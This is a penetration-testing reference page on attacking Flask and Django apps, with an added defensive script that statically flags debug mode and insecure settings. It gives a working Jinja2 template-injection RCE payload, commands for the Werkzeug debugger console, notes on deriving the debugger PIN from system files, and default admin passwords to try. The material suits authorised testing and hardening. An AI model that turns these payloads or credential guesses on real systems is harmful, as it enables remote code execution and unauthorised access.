Flask / Django

What it is: Python web frameworks. Flask is lightweight (built on Werkzeug and Jinja2); Django is full-featured. Flask debug mode that exposes the Werkzeug debugger is an instant RCE, because the debugger serves an interactive Python console. Jinja2 SSTI is the other primary attack vector.

Default ports: 5000 (Flask), 8000 (Django), 80, 443

Vuln research:


Detect Flask/Django

Headers and debug pages reveal the framework

curl -sI http://$IP/ | grep -i server
# A Server header of the form "Werkzeug/x.y Python/3.z" indicates Flask (or another Werkzeug-based app)

Werkzeug debugger RCE

Flask debug mode exposed — Interactive Python console

curl http://$IP/console
# If you see the Werkzeug debugger console:
# Enter: import os; os.popen('id').read()
# If PIN protected, calculate from /etc/passwd, /sys/class/net/eth0/address, /etc/machine-id

Flask SSTI (Jinja2)

Server-side template injection — Test with math expressions

curl "http://$IP/search?q={{7*7}}"
# RCE:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Django debug mode

Exposes settings, SQL queries, and paths — Information disclosure

curl http://$IP/nonexistent_path_12345
# Debug page reveals: URL patterns, installed apps, database settings, SECRET_KEY
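
As an added defensive check that is not part of the original page, the following stdlib-only audit parses a Django settings.py or a Flask entry point with ast and flags the settings behind the Werkzeug console and Django debug-page exposures described above. The sample sources are constructed placeholders, and the SECRET_KEY heuristic mirrors Django's own system check, which warns on keys shorter than 50 characters or carrying the generated django-insecure- prefix.

```python
import ast
from typing import List

# Constructed sample of a Django settings.py as it might ship to production
# (assumed content, not from the page; the values are placeholders).
DJANGO_SETTINGS = """
SECRET_KEY = 'django-insecure-CHANGE-ME'
DEBUG = True
ALLOWED_HOSTS = ['*']
"""

# Constructed sample of a Flask entry point that turns on the Werkzeug debugger.
FLASK_APP = """
from flask import Flask
app = Flask(__name__)
if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
"""

def _is_true(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and node.value is True

def audit_source(src: str) -> List[str]:
    """Statically flag settings that expose debug pages or the Werkzeug console."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        # Django settings: module-level assignments to well-known names
        if isinstance(node, ast.Assign) and len(node.targets) == 1 \
                and isinstance(node.targets[0], ast.Name):
            name, value = node.targets[0].id, node.value
            if name == "DEBUG" and _is_true(value):
                findings.append("DEBUG=True: error pages leak settings, URL patterns and SQL")
            elif name == "ALLOWED_HOSTS" and isinstance(value, (ast.List, ast.Tuple)) and any(
                    isinstance(e, ast.Constant) and e.value == "*" for e in value.elts):
                findings.append("ALLOWED_HOSTS=['*']: Host header is not validated")
            elif name == "SECRET_KEY" and isinstance(value, ast.Constant) \
                    and isinstance(value.value, str) \
                    and (value.value.startswith("django-insecure-") or len(value.value) < 50):
                findings.append("SECRET_KEY: hard-coded/insecure literal, load it from the environment")
        # Flask: app.run(debug=True) serves the Werkzeug debugger console
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) \
                and node.func.attr == "run":
            if any(kw.arg == "debug" and _is_true(kw.value) for kw in node.keywords):
                findings.append("app.run(debug=True): Werkzeug debugger console, RCE if reachable")
    return findings
```

Run audit_source over each checked-in settings or entry-point file in CI and fail the build on any finding.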

Django admin panel

Default admin interface — Try common credentials

curl http://$IP/admin/
# Default: admin:admin, admin:password